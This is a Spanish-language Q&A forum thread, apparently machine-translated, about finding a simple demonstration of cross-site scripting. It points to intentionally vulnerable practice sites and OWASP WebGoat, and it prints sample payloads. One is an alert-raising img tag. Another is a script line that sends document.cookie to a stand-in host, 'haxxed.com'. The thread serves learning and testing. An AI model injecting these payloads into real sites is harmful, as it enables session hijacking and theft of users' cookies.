¿Puede alguien mostrarme un ataque Cross-site scripting en vigor en mi navegador? ¿Hay algún ejemplo en internet que haga esto? No he encontrado esto en internet.Un ejemplo simple de un ataque de secuencias de comandos entre sitios
Cuanto más simple es el ejemplo, mejor.
Ver http://www.insecurelabs.org y http://www.insecurelabs.org/task/
intencionalmente vulnerable a XSS en el campo de búsqueda y varios otros lugares.
En general, tendrá que instalar su propio software del lado del servidor para un ejemplo de XSS en vivo. No muchos sitios legítimos abrirán un error XSS intencionalmente a los internautas.
Una pieza de software lista para usar del lado del servidor que le permite demostrar XSS (entre muchas otras cosas) a usted mismo es WebGoat de OWASP. Aquí están instructions to install WebGoat and demonstrate XSS. Encontrará ejemplos adicionales de fragmentos de programa que permiten XSS en el artículo de OWASP "Cross-site scripting (XSS)".
<img src="javascript:alert('hello everybody')"></img> La etiqueta de imagen que inserté es un ejemplo de xss. el src anterior contiene el script java que te alerta.
Esto no hace nada? –
Formulario simple también sería: Si aparece el cuadro de mensaje, ya sabes, que la página o el servidor es vulnerable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Una gran muestra de cómo funciona la técnica se pueden encontrar aquí https://www.hacksplaining.com/exercises/xss-stored
Tipo en busca y me alerta –
Sí, pero el punto es no revelar toda la errores aquí. Y ciertamente hay más que eso. – Erlend